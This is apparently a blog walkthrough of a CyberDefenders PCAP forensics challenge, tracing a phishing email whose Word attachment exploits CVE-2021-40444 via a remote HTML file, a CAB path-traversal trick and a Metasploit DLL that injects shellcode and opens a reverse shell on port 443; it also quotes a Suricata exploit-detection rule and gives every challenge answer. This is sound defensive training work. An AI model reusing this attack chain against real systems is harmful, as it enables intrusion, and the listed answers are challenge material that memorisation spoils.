forensicskween

CyberDefenders: BSidesJeddah-Part1

As a security consultant, a phishing attack attributed to a popular APT group targeted one of your customers. Given the provided PCAP trace, analyze the attack and answer challenge questions.

Information

Category Name: BSidesJeddah-Part1

Files:
c62-bsidesjeddah-pcap.zip 46 MB
– e3.pcap 50 MB
– suricata.zip 1.8 MB

My Recommendations

It’s all we need to solve the challenge:

wireshark -v

Download it from CyberDefenders and verify it with:

sha1sum /path/to/c62-bsidesjeddah-pcap.zip

SHA1SUM: c1995aff38c8947a2555e575e1cef2df3c4f888e

Walkthrough

1. What is the victim's MAC address?

An easy way to figure this out, is to use the Export Objects > HTTP. Then, look for octet-stream as Content-Type.

Then, we can choose any of the packet. For instance, packet 3606, and look at its details. Logically, the destination address is the Victim address:

Answer: 00:0C:29:B7:CA:91

 

2. What is the address of the company associated with the victim's machine MAC address?

I am using this Website to find this information:

Answer: 3401 Hillview Avenue Palo Alto CA 94304 US

3. What is the attacker's IP address?

We identified the Victim’s Mac Address by looking at frame 3606, which contains an HTTP response for an executable. The source IP is 192.168.112.128:

Answer: 192.168.112.128

 

4. What is the IPv4 address of the DNS server used by the victim machine?

Filtering with eth.src == 00:0C:29:B7:CA:91 && dns


The packets are all for Destination IPv4 192.168.112.2.

Answer: 192.168.112.2

5. What domain is the victim looking up in packet 5648?

Filtering with frame.number == 5648

Answer: omextemplates.content.office.net 

6. What is the server certificate public key that was used in TLS session:

731300002437c17bdfa2593dd0e0b28d391e680f764b5db3c4059f7abadbb28e

Filtering with tls.handshake.type == 11 && tls.handshake.session_id_length == 32. The first filter is for TLS records that send server certificates, the second one filters for session_id length 32, the same as the one provided. The match for the session_id is frame 2739. The Server Certificate Public Key can be found under EC Diffie-Hellman Server Params:

Answer: 64089e29f386356f1ffbd64d7056ca0f1d489a09cd7ebda630f2b7394e319406

7. What domain is the victim connected to in packet 4085?

Filtering with frame.number == 4085. It contains no information on a domain, so we can select View > Name Resolution and checkmark all the options. Now, the DNS for the IP address is resolved:

 

Answer: v10.vortex-win.data.microsoft.com

8. The attacker conducted a port scan on the victim machine. How many open ports did the attacker find?

When conducting a scan port, the target sends a SYN, ACK reply to affirm that x port is open.

We must filter the pcap accordingly : ip.dst == 192.168.112.128 and tcp.flags.syn==1 and tcp.flags.ack==1. Then, we can simply go to Statistics > Endpoints and check ‘Limit to display filter’.

Although Wireshark shows 28 ports, we are actually only interested in the ones associated with the Victim’s IP. Moreover, we can filter by Bytes in Descending order, which means a proper ‘ping’  was established.

Answer: 7

9. Analyze the pcap using the provided rules. What is the CVE number falsely alerted by Suricata?

Using Suricata in cli mode, then looking at the logs:

				
					suricata -r e3.pcap -S suricata.rules
 cat fast.log | grep EXPLOIT | sed '/Invalid/d'

Now checking the Pcap file. The rule is defined as:

				
					alert ipv6 any any -> ff00::/8 any (msg:"ET EXPLOIT Possible CVE-2020-11899 Multicast out-of-bound read";  reference:url,www.jsof-tech.com/ripple20/; classtype:attempted-admin; sid:2030387; rev:1; metadata:created_at 2020_06_22, former_category EXPLOIT, performance_impact Significant, signature_severity Major, updated_at 2020_08_20;)

filtering for ipv6.addr == fe80:0000:0000:0000:d4aa:8d54:3230:720b (as flagged in the logs)

I can’t really find a reason why the packet would be flagged. But, according to the reference, a patch was issued on 30/03/2020. On top of that, the alert is issued over any multicast ipv6 addresses. Packet 2692 is the only packet that makes such a request.

Answer: CVE-2020-11899

10. What is the command parameter sent by the attacker in packet number 2650?

Filtering with frame.number == 2650, which is over protocol SMTP.


The Request Parameter is kali.

Answer: kali

 

11. What is the stream number which contains email traffic?

If we filter with smtp, frame 2653 contains Request Parameter: FROM:<support@cyberdefenders.org> – which we can assume is the beginning of Email traffic. Selecting Follow -> TCP Stream shows that it is indeed email traffic:

Answer: 1183

12. What is the victim's email address?

As seen above, the victim is joshua, as he’s the one that received the email.

Answer: joshua@cyberdefenders.org

13. What was the time attacker sent the email?

In TCP Stream 1183, we saw that the email was sent on 1 Oct 2021 at 12:31:54:

Answer: 12:31:54

14. What is the version of the program used to send the email?

Again, in TCP Stream 1183, the email headers show that the email agent is sendEmail and it is running version 1.56:

Answer: 1.56

15. What is the MD5 hash of the email attachment?

Now, we can copy the Base64 encoded attachment, decode and save it to our machine:

				
					echo -n '#base64encoded' | base64 -d > 'web server.docx'
md5sum 'web server.docx'
#returns 55e7660d9b21ba07fc34630d49445030

Answer: 55e7660d9b21ba07fc34630d49445030

16. What is the CVE number the attacker tried to exploit using the malicious document?

Submitting the hash to VirusTotal shows many many many flags for CVE-2021-40444:

 

Answer: CVE-2021-40444 

17. The malicious document file contains a URL to a malicious HTML file.

Provide the URL for this file.

We can unzip the file and grep for ‘.html’:

				
					7z x 'web server.docx' -owebserver
grep -r -F '.html' webserver

Answer: http://192.168.112.128/word.html

18. What is the LinkType of the OLEObject related to the relationship which contains the malicious URL?

Using xmldump.py to pretty print the file, and retrieve the ID for the relationship:

				
					xmldump.py attributes webserver/word/_rels/document.xml.rels

Now we can check the corresponding file:

				
					xmldump.py pretty webserver/word/document.xml | grep rId6 -B 5 -A 5

The LinkType is EnhancedMetaFile.

Answer: EnhancedMetaFile

19. What is the Microsoft Office version installed on the victim machine?

Now that we know the file queries another file, we can set the filter in WireShark as http.request.uri == “/word.html”:

The HTTP requests’ User-Agent, initiated from the Victim’s machine shows that the Office Version is 15.0.4517.

Answer: 15.0.4517

20. The malicious HTML contains a js code that points to a malicious CAB file. Provide the URL to the CAB file?

We can save the file by selecting Export Objects > HTTP and saving the word.html file. 

				
					cat word.html

It’s obfuscated, but the URL to the cab file is stored in a variable:

Answer: http://192.168.112.128/word.cab

21. The exploit takes advantage of a CAB vulnerability. Provide the vulnerability name?

Looking for the CVE-2021-40444 + cab in google, I find this github repository that provides a nice explanation:

It mentions the ZipFlip vulnerability in the CAB. Here is a more detailed report on Zip Flip.

Answer: zipslip

22. The CAB file contains a malicious dll file. What is the tool used to generate the dll?

Following the same steps as Question 20, we can save the ‘word.cab’ file to our WD. Trying to extract it with cabextract and 7z returns errors, which makes sense given the nature of the attack. Instead, we can dump the files with binwalk:

				
					binwalk --dd=".*" -e word.cab
file _word.cab.extracted/*
#file 52 is a PE executable
md5sum _word.cab.extracted/52
#returns 2d7972ec8f063348991490c3d15ce989

Now, checking the hash in VirusTotal shows it’s flagged as a Meterpreter/Metasploit Trojan.

Answer: metasploit

23. What is the path of the dropped malicious dll file? Replace your username with IEUser

As mentioned on the Github repository, the inf file (msword.inf) can be stored in the TEMP User directory. In this case it would be AppData\Local\Temp\msword.inf.

Answer: 
C:\Users\IEUser\AppData\Local\Temp\msword.inf

 

24. Analyzing the dll file what is the API used to write the shellcode in the process memory?

Running pedump on the file:

				
					pedump _word.cab.extracted/52

The function WriteProcessMemory is imported:

It’s the only one capable of writing to process memory.

Answer: WriteProcessMemory

25. Extracting the shellcode from the dll file. What is the name of the library loaded by the shellcode?

We don’t need to do some reverse engineering, as the executable can be ran into scdbg, which will automatically find the shellcode:

The Loaded Library is wininet.

Answer: wininet

26. Which port was configured to receive the reverse shell?

In the output of the scdbg, the API InternetConnectA is used to receive a shell on the Attacker’s ip with the port 443:

Answer: 443
Twitter Github Discord

Recent Posts

Follow Us

Featured Video

Guide

Picture of forensicskween

forensicskween

Leave a Reply

Twitter
Reddit
Facebook

••• You Might Also Enjoy

Socials

Twitter Github
Resources
None
Pages

Copyright © 2023 forensicskween

Discover more from forensicskween

Subscribe now to keep reading and get access to the full archive.

Continue reading